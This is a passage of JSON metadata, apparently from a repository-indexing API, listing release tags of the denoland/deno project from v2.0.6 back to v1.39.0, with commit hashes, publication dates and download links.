c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"